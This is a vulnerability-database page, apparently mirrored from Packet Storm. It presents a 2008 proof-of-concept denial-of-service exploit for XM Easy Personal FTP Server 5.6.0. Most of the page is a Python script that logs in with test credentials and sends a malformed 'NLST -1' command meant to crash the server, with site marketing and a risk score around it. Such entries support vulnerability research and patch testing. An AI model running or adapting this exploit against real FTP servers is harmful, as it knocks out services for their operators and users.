Lucene search

K

xmeasy560-dos.txt

๐Ÿ—“๏ธย 13 Oct 2008ย 00:00:00Reported byย shinnaiTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 20ย Views

XM Easy Personal FTP Server 5.6.0 Remote Denial of Service exploi

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`print "--------------------------------------------------------------"  
print "# XM Easy Personal FTP Server 5.6.0 Remote Denial of Service"  
print "# url: http://www.dxm2008.com/"  
print "# author: shinnai"  
print "# mail: shinnai[at]autistici[dot]org"  
print "# site: http://www.shinnai.net"  
print "--------------------------------------------------------------"  
  
import socket  
import time  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
  
try:  
conn = s.connect(("127.0.0.1",21))  
d = s.recv(1024)  
print "Server <- " + d  
time.sleep(2)  
  
s.send('USER test\r\n')  
print "Client -> USER: test"  
d = s.recv(1024)  
print "Server <- " + d  
time.sleep(2)  
  
s.send('PASS test\r\n')  
print "Client -> PASS: test"  
d = s.recv(1024)  
print "Server <- " + d  
time.sleep(2)  
  
s.send('NLST -1\r\n')  
print "Client -> NSLT: -1"  
d = s.recv(1024)  
print "Server <- " + d  
time.sleep(2)  
except:  
print "- Unable to connect. exiting."  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
13 Oct 2008 00:00Current
7.4High risk
Vulners AI Score7.4
20
.json
Report